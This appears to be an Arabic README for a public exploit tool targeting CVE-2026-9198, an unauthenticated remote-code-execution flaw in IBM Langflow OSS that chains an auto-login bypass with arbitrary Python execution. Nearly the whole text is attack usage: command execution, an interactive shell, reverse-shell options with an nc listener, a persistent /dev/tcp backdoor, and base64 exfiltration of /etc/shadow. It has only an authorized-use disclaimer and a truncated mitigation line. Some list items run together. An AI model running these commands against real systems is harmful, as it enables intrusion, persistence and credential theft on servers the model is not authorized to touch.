
IBM Langflow غير مصادق عليه RCE عبر Auto-Login Bypass
CVE-2026-9198 هي ثغرة حرجة لتنفيذ الأوامر عن بُعد (RCE) غير موثقة في IBM Langflow OSS. يستغل هذا الاستغلال ثغرتين:
/api/v1/validate/code يسمح بتنفيذ أكواد Python عشوائية⚠️ تحذير: هذه الأداة لأغراض الاختبار الأمني المصرح به والتعليم فقط. الاستخدام غير المصرح به غير قانوني.
pipgit clone https://github.com/0xgh057r3c0n/CVE-2026-9198.git
cd CVE-2026-9198
pip install termcolor
أو تثبيت جميع التبعيات مرة واحدة:
pip install -r requirements.txt
python CVE-2026-9198.py --help
يجب أن تظهر قائمة المساعدة مع جميع الخيارات المتاحة.
تنفيذ أمر واحد على الهدف:
python CVE-2026-9198.py -t <target_ip> -c "id"
مثال:
python CVE-2026-9198.py -t 192.168.1.100 -c "whoami"
تشغيل صدفة تفاعلية مع موجهات ديناميكية:
python CVE-2026-9198.py -t <target_ip> --shell
الميزات:
user@host والدليل الحاليcd مع تحديث تلقائي للموجهجلسة مثال:
┌─[root@0xgh057r3c0n]─[~]
└──╼ $ whoami
root
┌─[root@0xgh057r3c0n]─[~]
└──╼ $ cd /tmp
┌─[root@0xgh057r3c0n]─[/tmp]
└──╼ $ pwd
/tmp
إرسال حمولة صدفة عكسية إلى مستمع:
python CVE-2026-9198.py -t <target_ip> --lhost <your_ip> --lport <port>
مثال:
# على جهازك - تشغيل المستمع
nc -lvnp 4444
# ثم تشغيل الاستغلال
python CVE-2026-9198.py -t 192.168.1.100 --lhost 192.168.1.50 --lport 4444
إذا كان Langflow يعمل على منفذ غير افتراضي:
python CVE-2026-9198.py -t <target_ip> -p <port> -c "whoami"
مثال:
python CVE-2026-9198.py -t 192.168.1.100 -p 8080 -c "ls -la"
تخطي عملية تسجيل الدخول التلقائي واستخدام رمز موجود:
python CVE-2026-9198.py -t <target_ip> -k <your_jwt_token> -c "id"
تعديل مهلة HTTP للشبكات البطيئة:
python CVE-2026-9198.py -t <target_ip> --timeout 30 -c "whoami"
| الوسيط | الوصف | مطلوب | الافتراضي |
|---|---|---|---|
-t, --target | المضيف الهدف/IP أو عنوان URL كامل | ✅ نعم | - |
-p, --port | منفذ Langflow | ❌ لا | 7860 |
-c, --cmd | تنفيذ أمر واحد | ❌ لا | "id" |
--shell | وضع الصدفة التفاعلية الزائفة | ❌ لا | False |
--lhost | IP مستمع الصدفة العكسية | ❌ لا | - |
--lport | منفذ مستمع الصدفة العكسية | ❌ لا | 4444 |
-k, --token | استخدام رمز حامل مقدم | ❌ لا | - |
--timeout | مهلة HTTP بالثواني | ❌ لا | 20 |
--no-banner | إخفاء الشعار | ❌ لا | False |
python CVE-2026-9198.py -t 192.168.1.100 -c "uname -a"
python CVE-2026-9198.py -t 192.168.1.100 --shell
# ثم داخل الصدفة:
ls -la
cat /etc/passwd
# إنشاء صدفة عكسية دائمة
python CVE-2026-9198.py -t 192.168.1.100 -c "echo 'bash -i >& /dev/tcp/192.168.1.50/4444 0>&1' > /tmp/backdoor.sh && chmod +x /tmp/backdoor.sh && /tmp/backdoor.sh"
python CVE-2026-9198.py -t 192.168.1.100 -c "nmap -sP 192.168.1.0/24"
python CVE-2026-9198.py -t 192.168.1.100 -c "cat /etc/shadow | base64"
للحماية من هذه الثغرة:
/api/v1/auto_login و /api/v1/validate/codeهذه الأداة مقدمة لأغراض تعليمية وأمنية مصرح بها فقط. المؤلف غير مسؤول عن أي سوء استخدام أو ضرر يسببه هذا البرنامج. المستخدمون مسؤولون وحدهم عن الامتثال للقوانين واللوائح المعمول بها.
هذا المشروع مرخص تحت رخصة MIT - راجع ملف LICENSE للتفاصيل.
0xgh057r3c0n
المساهمات مرحب بها! لا تتردد في تقديم طلب سحب (Pull Request).
git checkout -b feature/AmazingFeature)git commit -m 'إضافة ميزة رائعة')git push origin feature/AmazingFeature)إذا وجدت هذه الأداة مفيدة، يرجى التفكير في منحها نجمة ⭐ على GitHub!